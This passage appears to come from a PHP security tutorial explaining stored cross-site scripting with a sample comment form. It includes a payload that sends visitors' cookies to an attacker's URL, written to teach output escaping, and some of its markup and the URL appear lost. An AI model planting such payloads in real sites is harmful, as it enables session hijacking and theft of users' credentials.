Cross-site scripting (XSS) is one of the most common and best known kinds of attacks.
The simplicity of this attack and the number of vulnerable applications in
existence make it very attractive tomalicious users. An XSS attack exploits the user’s
trust in the application and is usually an effort to steal user information, such as
cookies and other personally identifiable data. All applications that display input
are at risk.
Consider the following form, for example. This form might exist on any of a number
of popular community websites that exist today, and it allows a user to add a
comment to another user’s profile. After submitting a comment, the page displays
all of the comments that were previously submitted, so that everyone can view all of
the comments left on the user’s profile.
<form method=”POST” action=”process.php”>
<p>Add a comment:</p>
<textarea name=”comment”>
<input type=”submit” />
Imagine that a malicious user submits a comment on someone’s profile that contains
the following content:
document.location = ’’’’
+ document.cookie;
Now, everyone visiting this user’s profile will be redirected to the given URL and their
cookies (including any personally identifiable information and login information)
will be appended to the query string. The attacker can easily access the cookies with
$_GET[’cookies’] and store them for later use. This attack works only if the application
fails to escape output. Thus, it is easy to prevent this kind of attack with proper
output escaping.